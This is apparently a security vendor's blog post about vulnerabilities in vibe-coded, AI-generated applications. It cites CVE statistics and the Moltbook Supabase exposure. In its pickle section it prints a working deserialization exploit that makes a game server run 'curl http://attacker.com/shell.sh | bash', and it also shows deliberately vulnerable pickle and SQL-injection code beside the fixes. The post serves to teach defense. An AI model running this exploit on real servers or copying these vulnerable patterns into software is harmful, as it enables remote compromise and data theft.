By the Security Research Team at Precogs.ai — March 2026
"A year ago, most developers used AI for autocomplete. Now people are vibe coding entire projects, shipping code they've barely read. That's a different risk profile entirely." — Hanqing Zhao, Georgia Tech SSLab, March 2026
Vibe coding is the most significant shift in software development in a generation. It is also, right now, producing a measurable, accelerating wave of exploitable vulnerabilities that are reaching production systems faster than any security team can track.
The numbers are no longer theoretical. In March 2026 alone, at least 35 new CVE entries were disclosed that were the direct result of AI-generated code — up from 6 in January and 15 in February. Security firm Tenzai tested 5 major AI coding tools by building 3 identical applications with each, and found 69 vulnerabilities across all 15 apps. Every single tool introduced Server-Side Request Forgery vulnerabilities. Zero apps built CSRF protection. Zero apps set security headers. Escape.tech scanned 5,600 publicly deployed vibe-coded applications and found 2,000+ vulnerabilities and 400+ exposed secrets.
This is not a warning about a future risk. This is a post-mortem on a crisis that is already happening — with real breaches, real CVEs, and real data sitting exposed on the internet right now because a founder trusted an AI assistant to build something production-safe and no one checked.
This blog is for every developer, security engineer, and engineering leader who is using AI coding tools, shipping AI-generated code, or responsible for a product where either of those is true. Which, in 2026, is nearly everyone.
Table of Contents
- What Is Vibe Coding — And Why Is It a Security Problem Now
- The Data: CVE Counts, Breach Numbers, and What They Actually Mean
- The Moltbook Incident: A Real Breach, Built Entirely by AI
- Why AI Tools Generate Insecure Code — The Structural Reasons
- The Pickle RCE: When a Snake Game Becomes a Backdoor
- Injection Flaws in AI-Generated Code: The Classics Never Die
- Broken Authentication and Authorization: The Most Common AI Failure
- The Hallucinated Package Problem: Supply Chain Attacks by Proxy
- Missing Security Headers: The Invisible Defaults
- SSRF in Every App: The 100% Failure Rate
- Business Logic Gaps: What AI Can Never Know
- The Amazon Incident: When Vibe Coding Hits Production at Scale
- How to Prompt Your AI for Secure Code
- How Precogs.ai Catches What Your AI Assistant Ships
- A Secure Vibe Coding Workflow
- Conclusion: The Vibe Is Not the Problem. The Gap Is.
1. What Is Vibe Coding — And Why Is It a Security Problem Now
When Andrej Karpathy coined the term "vibe coding" in February 2025, he described a state where developers "fully give in to the vibes" — describing what they want in natural language, accepting whatever the LLM generates, and shipping without deep review. Collins English Dictionary named it Word of the Year. Within 18 months it had moved from a curiosity to the dominant development paradigm for a significant fraction of the software being shipped in 2026.
The workflow is seductive in its simplicity:
Prompt: "Build me a REST API for a SaaS app with user registration,
login, subscription management via Stripe, and a dashboard
showing usage metrics. Use FastAPI and PostgreSQL."
→ AI generates ~2,000 lines of code in 30 seconds
→ Developer reviews: "Looks good, tests pass"
→ Code ships to productionThe problem is not the speed. The problem is the gap between "tests pass" and "is secure." These are not the same thing — and AI coding tools generate entire applications from scratch in a black box: you don't see how the model weighs different implementation choices or what assumptions it makes about security. The code can bypass the review and testing workflows that catch problems in traditional development.
When a human developer writes a login function, every security decision is visible and explicit. When an AI writes it, those decisions are implicit — embedded in training data patterns that optimize for functionality, not security. AI coding tools can reproduce insecure patterns from training data or generate flawed logic under pressure to produce fast results, leading to injection flaws, weak authentication, broken authorization, and unsafe handling of sensitive data.
The shift that makes 2026 different from 2024 is not that AI-generated code became less secure. It is that the scale and autonomy changed. A year ago, developers used AI for autocomplete suggestions. Today, entire projects — authentication systems, payment integrations, database schemas, API layers — are being generated end-to-end and shipped with minimal human review. The risk profile is categorically different.
2. The Data: CVE Counts, Breach Numbers, and What They Actually Mean
Georgia Tech's Systems Software & Security Lab launched the Vibe Security Radar in May 2025 to track exactly this phenomenon. The methodology is rigorous: pull CVEs from public vulnerability databases, find the commit that fixed each vulnerability, trace backwards to find who introduced the bug, and flag it if the introducing commit has an AI tool's signature.
As of March 20, 2026, the CVE scorecard reads 74 CVEs attributable to AI-authored code, out of 43,849 advisories analyzed. In March 2026 alone: 27 CVEs authored by Claude Code, 4 by GitHub Copilot, 2 by Devin, and 1 each by Aether and Cursor.
Claude Code's prominence in these numbers requires context. Claude Code's overrepresentation appears to follow from its recent surge in popularity and the fact that it always leaves a signature. Tools like Copilot's inline suggestions leave no trace at all, so they're harder to catch.
The 74 confirmed CVEs are almost certainly a massive undercount. Georgia Tech researcher Hanqing Zhao estimates the real number is likely 5 to 10 times higher than what they currently detect — roughly 400 to 700 cases across the open-source ecosystem. Take OpenClaw as an example: it has more than 300 security advisories and appears to have been heavily vibe-coded, but most AI traces have been stripped away. We can only confidently confirm around 20 cases with clear AI signals.
Beyond CVEs, the picture from application scanning is even more alarming:
- Carnegie Mellon found that 61% of AI-generated code is functionally correct but only 10.5% is fully secure
- CodeRabbit's December 2025 study found vibe-coded PRs produced 1.7 times more major issues, up to 2.7 times more XSS vulnerabilities, and a 23.5% increase in production incidents per pull request
- Escape.tech discovered 2,000+ vulnerabilities and 400+ exposed secrets in 5,600 publicly deployed vibe-coded applications
3. The Moltbook Incident: A Real Breach, Built Entirely by AI
Theory becomes real with Moltbook — and this case study should be required reading for every founder using vibe coding tools.
In February 2026, Moltbook — a social networking site for AI agents — made international security news. The entire platform had been built through vibe coding. The founder publicly said he wrote zero lines of code himself. Security firm Wiz discovered a misconfigured Supabase database that had been left with public read and write access. The exposure included 1.5 million authentication tokens and 35,000 email addresses — all wide open to the internet.
The root cause was not a sophisticated attack. The AI scaffolded the database with permissive settings during development and the founder — who hadn't reviewed the infrastructure code — deployed it as-is.
This is the accountability gap that defines the vibe coding security crisis. When a vulnerability is found six months later in AI-generated code, there's no author to ask "why did you do it this way?" — because no human made that decision. The AI did. And the AI doesn't document its reasoning.
The specific failure in Moltbook's case was a Supabase Row Level Security configuration:
-- What the AI generated (DANGEROUS default):
-- No RLS policies created. Table accessible to anon role by default.
CREATE TABLE user_sessions (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
user_id UUID REFERENCES users(id),
token TEXT NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW()
);
-- Supabase's anon key has SELECT access to all tables without RLS policies
-- Result: 1.5 million session tokens readable by anyone with the anon key
-- What it should have looked like:
-- Enable Row Level Security immediately
ALTER TABLE user_sessions ENABLE ROW LEVEL SECURITY;
-- Users can only read their own sessions
CREATE POLICY "Users can view own sessions"
ON user_sessions FOR SELECT
USING (auth.uid() = user_id);
-- Service role only for writes
CREATE POLICY "Service role can insert sessions"
ON user_sessions FOR INSERT
WITH CHECK (auth.role() = 'service_role');The AI generated a working session management system. It did not generate a secure one. And without a developer who understood Supabase's security model, the difference was invisible until Wiz's scanner found it.
4. Why AI Tools Generate Insecure Code, The Structural Reasons
Understanding why AI coding tools produce insecure code is essential to knowing where to look for the problems they introduce.
4.1 Training Data Reflects the Internet — Which Is Insecure
AI coding models are trained on vast corpora of public code. The internet is full of tutorials, Stack Overflow answers, and example code that prioritizes getting something working quickly over getting it working securely. Insecure patterns — SQL string concatenation, hardcoded secrets in examples, missing input validation in tutorials — are well-represented in training data. The model learns to produce outputs that look like the code it was trained on.
4.2 Optimization Target Is Functionality, Not Security
Vibe coding optimizes for features, not permissions. Access control is an architectural decision that gets made implicitly by the AI — and those implicit decisions are often wrong. The model is evaluated on "does this code work?" not "is this code secure?" These are different evaluation criteria with different outputs.
4.3 No Business Context
AI has no knowledge of your specific threat model, your user base's risk profile, your regulatory requirements, or your business logic invariants. Because AI lacks an understanding of your specific business logic, it can build applications that technically work but violate domain rules, regulatory requirements, or customer trust.
4.4 Security Is Often Invisible to the Model
Many security properties are defined by what's absent — a missing rate limit, a missing ownership check, a missing CSRF token, a missing security header. AI models are better at generating present things than noticing absent things. The generated code looks complete because it has all the features. The security holes are invisible because there's nothing to see.
4.5 The "Looks Good" Trap
AI-generated code is syntactically clean, well-structured, and passes basic linting. It looks more professional than hastily written human code. This creates a cognitive trap where developers extend more trust to it than it deserves. A messy function written by a junior developer triggers review instincts. A beautifully formatted AI-generated function lulls them to sleep.
5. The Pickle RCE: When a Snake Game Becomes a Backdoor
The Databricks AI Red Team's Snake game experiment is one of the most illustrative examples of how vibe coding produces invisible vulnerabilities.
When they asked Claude to build a multiplayer snake game, the AI-generated network layer used Python's pickle module to serialize and deserialize game objects — a module notorious for enabling arbitrary remote code execution. The app ran perfectly. The vulnerability was invisible to anyone who didn't already know about pickle exploits.
Here is exactly what the AI generated and why it is catastrophic:
#AI-generated multiplayer Snake game network layer
#telnyx/_client.py — DANGEROUS: pickle for network serialization
import socket
import pickle
import threading
class GameServer:
def __init__(self, host='0.0.0.0', port=9999):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((host, port))
self.server.listen(5)
self.players = {}
def handle_client(self, conn, addr):
while True:
data = conn.recv(4096)
if not data:
break
# CRITICAL VULNERABILITY: Deserializing untrusted network data with pickle
# Any connected client can send a crafted payload for RCE
game_state = pickle.loads(data) # ← Arbitrary code execution here
self.update_game(game_state)
def send_state(self, conn, state):
conn.sendall(pickle.dumps(state)) # ← Also dangerous on receive sideAn attacker who can connect to this game server — which listens on 0.0.0.0, meaning all interfaces — can send a crafted pickle payload:
#Attacker's exploit: craft a malicious pickle payload
import pickle
import os
import socket
class RCEPayload:
def __reduce__(self):
#This executes on the SERVER when pickle.loads() is called
return (os.system, ("curl http://attacker.com/shell.sh | bash",))
#Serialize the malicious payload
malicious_data = pickle.dumps(RCEPayload())
#Send to game server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('target-game-server.com', 9999))
sock.sendall(malicious_data)
#Server executes: curl http://attacker.com/shell.sh | bash
#Full remote code execution achievedThe fix is trivial — use JSON instead of pickle for network serialization:
#SAFE: JSON serialization for network data
import json
class GameServer:
def handle_client(self, conn, addr):
while True:
data = conn.recv(4096)
if not data:
break
try:
#JSON cannot execute arbitrary code on deserialization
game_state = json.loads(data.decode('utf-8'))
#Validate the structure before processing
if not self._validate_game_state(game_state):
continue
self.update_game(game_state)
except (json.JSONDecodeError, KeyError, ValueError):
continue # Reject malformed input
def _validate_game_state(self, state: dict) -> bool:
required_keys = {'player_id', 'direction', 'position'}
return (
isinstance(state, dict) and
required_keys.issubset(state.keys()) and
state['direction'] in ('up', 'down', 'left', 'right')
)The fix was simple — switch from pickle to JSON — but only once the team caught the issue during review. Without that review, a malicious client could have executed arbitrary code on any game server.
This is the vibe coding security gap in its purest form: the AI produced working code. The working code was also a perfect RCE backdoor. A security review caught it. Without that review, it ships.
6. Injection Flaws in AI-Generated Code: The Classics Never Die
Ask a model to generate a login function, and you may receive something syntactically perfect, yet riddled with flaws — from hardcoded credentials to unvalidated inputs. A session cookie without the HttpOnly or Secure flag is an open invitation for hijacking. A dynamic SQL query built from unchecked user input is a textbook example of an injection vulnerability.
6.1 SQL Injection — Still Appearing in AI Code in 2026
#What AI tools frequently generate for search endpoints:
@app.route('/api/search')
def search_users():
query = request.args.get('q', '')
#DANGEROUS: String interpolation directly into SQL
sql = f"SELECT id, name, email FROM users WHERE name LIKE '%{query}%'"
results = db.execute(sql).fetchall()
return jsonify([dict(r) for r in results])